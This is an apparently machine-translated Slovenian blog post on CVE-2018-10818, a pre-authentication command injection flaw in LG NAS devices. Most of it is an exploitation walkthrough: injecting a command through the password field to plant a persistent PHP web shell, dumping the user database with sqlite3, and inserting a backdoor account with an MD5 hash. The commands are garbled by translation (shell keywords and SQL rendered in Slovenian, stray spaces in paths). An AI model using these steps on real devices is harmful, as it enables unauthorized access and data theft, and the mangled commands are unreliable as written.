Kritična ranljivost, ki jo najdemo v večini naprav LG NAS


Pregled:

Izvedli smo celovito oceno na napravi LG NAS. Ta naprava je shranjevalna naprava, povezana v omrežje, ki omogoča le pooblaščenim uporabnikom. Kot zasebni oblak, le da stane manj, je preprost za upravljanje in vam omogoča popoln nadzor. Vendar pa, našli smo način, kako vdreti v sistem s pomočjo predhodno overjene oddaljene ranljivosti za vbrizgavanje ukazov (CVE-2018-10818), ki nam nato omogoča, da naredimo praktično vse, vključno z dostopom do podatkov in posegom v uporabniške podatke in vsebino. 

Izkoriščanje:

Ranljivost (CVE-2018-10818) je vnaprej oddaljena ranljivost za odstranjevanje ukazov, odkrita v večini naprav LG NAS.

Kot prikazujemo v videoposnetku, se preprosto ne morete prijaviti z nobenim naključnim uporabniškim imenom in geslom. V parametru "geslo" pa obstaja ranljivost vbrizgavanja ukazov (uporabiti morate prestreznik, kot je burp). To napako lahko preprosto sprožimo tako, da jo dodamo. Če želite dodati novega uporabnika, lahko preprosto napišemo obstojno lupino z imenom c.php z uporabo:
; odmev "" > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Če ga vnesete kot geslo, izkorišča ranljivost.

Nato lahko z naslednjim ukazom uporabnike "izstavimo":
odmev ".dump user" | sqlite3 /etc/nas/db/share.db
Demping pomeni branje vseh podatkov iz baze podatkov. Izpustimo bazo podatkov, da bomo lahko videli uporabniška imena in gesla uporabnikov. To nam omogoča tudi, da dodamo svoje.

Za dodajanje novega uporabnika v bazo podatkov moramo ustvariti veljaven MD5. Z vključenim orodjem MD5 lahko ustvarimo hash z uporabniškim imenom »test« in geslom »1234.«
sudo nas-skupni md5 1234
Ko imamo veljavno geslo in uporabniško ime, ga lahko dodamo v bazo z naslednjim:
VSTAVITE V "uporabniške" VREDNOSTI ("test", "md5_hash", "Vuln test", "test @ localhost", ");
Ko je to končano, se lahko prijavimo v LG Network Storage s testom uporabniškega imena in geslom 1234.

To nam omogoča dostop do sistema kot pooblaščeni uporabnik. Od tod lahko dostopamo do vseh podatkov ali tajnih datotek, ki so shranjene na napravi LAS.

Priporočila:

  • Zavedajte se, da lahko naprave LAS vdrejo in izkoristijo.
  • Obrnite se na LG in jim sporočite to ranljivost in zahtevajte, da jo odpravijo.
  • Opozorite svoje prijatelje na facebooku (tukaj je povezava) ali twitterju (kliknite za tvit)
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me